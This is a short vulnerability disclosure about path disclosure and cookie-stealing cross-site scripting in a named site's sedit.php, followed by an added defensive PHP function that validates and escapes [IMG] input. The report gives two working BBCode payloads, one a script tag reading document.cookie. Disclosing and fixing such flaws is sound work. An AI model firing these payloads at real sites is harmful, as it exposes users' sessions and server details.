vulnerable script "http://www.antionline.com/sedit.php"
variable "message"
error :
Warning: getimagesize(): Read error! in /data/****/***/sedit.php on line 104
The error page could be used for hijacking because the submitted data that causes the error is used in the error page.
XSS: POST method.
code:
[IMG bbcode]/.././.[/IMGbbcode] (path disclosure)
[IMGbbcode]<script>alert(document.cookie)</script>[/IMGbbcode] (hijacking)
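
A defensive counterpart to the report above, as an added example that is not part of the original post and not the site's code: a hypothetical `render_img()` that validates the [IMG] body before any image function sees it, escapes it wherever it is echoed, and keeps PHP warnings out of the response. The function names and the sample URL are assumptions; the image-size check itself is left out so the block runs offline.

```php
<?php
// Added example; hypothetical handler, not the site's sedit.php.
ini_set('display_errors', '0');   // runtime warnings (and server paths) stay off the page
ini_set('log_errors', '1');       // ...but are still written to the server log

/** HTML-escape a value for element content or a quoted attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Render the body of an [IMG] tag, or an escaped error if it is not usable. */
function render_img(string $body): string
{
    $body   = trim($body);
    $scheme = strtolower((string) parse_url($body, PHP_URL_SCHEME));

    // Allow only absolute http(s) URLs, so a local path is never handed to
    // getimagesize() and cannot trigger a path-revealing warning.
    if (filter_var($body, FILTER_VALIDATE_URL) === false
        || !in_array($scheme, ['http', 'https'], true)) {
        // The rejected input is echoed only after escaping.
        return '<span class="error">Invalid image URL: ' . h($body) . '</span>';
    }

    // A valid URL is still escaped before it goes into the attribute.
    return '<img src="' . h($body) . '" alt="">';
}

// Constructed inputs: the two from the post plus one valid URL.
$samples = [
    '/.././.',
    '<script>alert(document.cookie)</script>',
    'https://example.com/a.png?x=1&y=2',
];
foreach ($samples as $s) {
    echo render_img($s), PHP_EOL;
}
```

Both inputs from the post come back as an escaped error message, with the `<script>` payload rendered as inert text; only the http(s) URL becomes an `<img>` tag.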